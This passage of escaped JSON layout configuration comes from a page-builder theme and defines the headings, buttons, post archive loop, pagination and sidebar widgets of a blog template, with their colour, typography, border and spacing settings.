"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"636-m3\",\"37-m3\"]},{\"id\":134,\"type\":\"hop-heading\",\"nodeId\":\"1735-m11\",\"style\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"size\":{\"unit\":\"em\",\"value\":\"10\"}}},\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"636-m4\",\"37-m4\"]},{\"id\":135,\"type\":\"hop-text\",\"nodeId\":\"1735-m12\",\"v\":\"1.1\",\"nodes\":[\"636-m5\",\"37-m5\"]},{\"id\":136,\"type\":\"hop-home-button-group\",\"nodeId\":\"22-m8\",\"v\":\"1.1\",\"nodes\":[\"636-m6\",\"37-m6\"]},{\"id\":137,\"type\":\"hop-home-button\",\"nodeId\":\"22-m9\",\"style\":{\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(2, 110, 159, 0)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"transform\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.5\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"descendants\":{\"icon\":{\"size\":{\"value\":\"16\",\"unit\":\"px\"},\"margin\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"},\"v\":\"1.1\",\"nodes\":[\"636-m7\",\"37-m7\"]},{\"id\":138,\"type\":\"hop-main\",\"nodeId\":\"38-m1\",\"v\":\"1.1\",\"nodes\":[\"639-m1\",\"40-m1\"]},{\"id\":139,\"type\":\"hop-archive-loop\",\"nodeId\":\"1738-m4\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"showMasonry\":false,\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"639-m2\",\"40-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":140,\"type\":\"hop-loop-item\",\"nodeId\":\"1706-c10\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"40\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"639-m3\",\"40-m3\"],\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":141,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"25-m20\",\"nodes\":[\"639-m4\",\"40-m4\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":142,\"type\":\"hop-column\",\"nodeId\":\"25-m21\",\"nodes\":[\"639-m5\",\"40-m5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":143,\"type\":\"hop-post-categories\",\"nodeId\":\"1738-m11\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"typography\":{\"transform\":\"lowercase\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m6\",\"40-m6\"]},{\"id\":144,\"type\":\"hop-post-title\",\"nodeId\":\"38-m7\",\"v\":\"1.1\",\"nodes\":[\"639-m7\",\"40-m7\"]},{\"id\":145,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c21\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"transform\":\"lowercase\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}},\"display\":\"none\"},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant1}\"}},\"separators\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"v\":\"1.1\",\"nodes\":[\"639-m8\",\"40-m8\"]},{\"id\":146,\"type\":\"hop-post-excerpt\",\"nodeId\":\"38-m8\",\"v\":\"1.1\",\"nodes\":[\"639-m9\",\"40-m9\"],\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":147,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"25-m20\",\"nodes\":[\"639-m10\",\"40-m10\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":20,\"unit\":\"%\"}}}}}},{\"id\":148,\"type\":\"hop-post-read-more\",\"nodeId\":\"25-m21\",\"nodes\":[\"639-m11\",\"40-m11\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}},\"image\":{\"boxShadow\":{\"enabled\":false,\"layers\":[{\"x\":\"2\",\"y\":\"2\",\"spread\":\"10\",\"blur\":\"2\",\"color\":\"#333\"}]}},\"frameImage\":{\"backgroundColor\":\"transparent\",\"width\":{\"value\":100},\"height\":{\"value\":100},\"thickness\":10,\"border\":{\"top\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"bottom\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"left\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"right\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"}},\"transform\":{\"translate\":{\"x\":{\"path\":\"value\"},\"x_value\":\"4\",\"y\":{\"path\":\"value\"},\"y_value\":\"6\"}},\"zIndex\":-1}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\",\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false}},{\"id\":149,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"25-m22\",\"nodes\":[\"639-m12\",\"40-m12\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":150,\"type\":\"hop-column\",\"nodeId\":\"25-m22\",\"nodes\":[\"639-m13\",\"40-m13\"],\"v\":\"1.1\"},{\"id\":151,\"type\":\"hop-column\",\"nodeId\":\"25-m23\",\"nodes\":[\"639-m14\",\"40-m14\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":152,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m29\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m15\",\"40-m15\"]},{\"id\":153,\"type\":\"hop-column\",\"nodeId\":\"25-m41\",\"nodes\":[\"639-m16\",\"40-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":154,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m17\",\"40-m17\"]},{\"id\":155,\"type\":\"hop-column\",\"nodeId\":\"25-m24\",\"nodes\":[\"639-m18\",\"40-m18\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":156,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m27\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m19\",\"40-m19\"]},{\"id\":157,\"type\":\"hop-row\",\"nodeId\":\"38-m2\",\"props\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":1,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"v\":\"1.1\",\"nodes\":[\"639-m20\",\"40-m20\"]},{\"id\":158,\"type\":\"hop-column\",\"nodeId\":\"38-m3\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"639-m21\",\"40-m21\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":159,\"type\":\"hop-archive-navigation\",\"nodeId\":\"38-m9\",\"v\":\"1.1\",\"nodes\":[\"639-m22\",\"40-m22\"]},{\"id\":160,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\",\"43-s1\"]},{\"id\":161,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\",\"43-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":162,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\",\"43-s13\"],\"v\":\"1.1\"},{\"id\":163,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\",\"43-s14\"],\"v\":\"1.1\"},{\"id\":164,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\",\"43-s15\"],\"v\":\"1.1\"},{\"id\":165,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\",\"43-s16\"],\"v\":\"1.1\"},{\"id\":166,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\",\"43-s3\"],\"v\":\"1.1\"},{\"id\":167,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\",\"43-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":168,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\",\"43-s5\"]},{\"id\":169,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\",\"43-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":170,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\",\"43-s7\"]},{\"id\":171,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\",\"43-s8\"]},{\"id\":172,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\",\"43-s9\"]},{\"id\":173,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\",\"43-s10\"]},{\"id\":174,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\",\"43-s11\"]},{\"id\":175,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\",\"43-s12\"],\"v\":\"1.1\"},{\"id\":176,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\